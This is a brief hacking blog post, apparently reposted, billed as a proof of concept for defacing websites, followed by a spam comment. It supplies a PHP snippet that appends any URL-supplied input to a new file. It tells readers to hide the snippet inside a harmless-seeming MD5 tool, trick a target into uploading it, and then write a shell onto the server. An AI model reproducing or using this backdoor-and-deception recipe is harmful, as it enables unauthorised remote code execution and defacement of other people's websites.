[POC] Defacing The Skiddies's Website through Social Engineering

Idea By : 0b0xed

Method Tested and 100% work .

What Is Social engineering ?

http://en.wikipedia.org/wiki/Social_engineering_(security)

The target must has WEBSITE to upload the script.

Copy and paste to your PHP Tools : –

$dud = $_GET[‘dud’];

$fh = fopen(‘test.php’, ‘a’);

fwrite($fh,$dud);

fclose($fh);




For example,I paste it to my MD5.php ,by using Social Engineering,force the target to upload the file.php to website.

Go to Target Website,for example 127.0.0.1/MD5.php and add ?dud= ,like this 127.0.0.1/MD5.php?dud=(paste your script here) and happy defacing :-)

Your shell located at : 127.0.0.1/test.php

[1][2][3][4][5]

References

  1. ^ (www.blogger.com)
  2. ^ (www.blogger.com)
  3. ^ (www.blogger.com)
  4. ^ (www.blogger.com)
  5. ^ (www.blogger.com)

Sumber : http://0b0xed.tor.my/




1 Response to "[POC] Defacing The Skiddies's Website through Social Engineering"

  1. I am very grateful for this enlightening article. I am new to this issue, but for me it elucidated several questions. Congratulations on your knowledge on the subject. Thank you very much.SUPERAntiSpyware Professional 6.0.1242

    ReplyDelete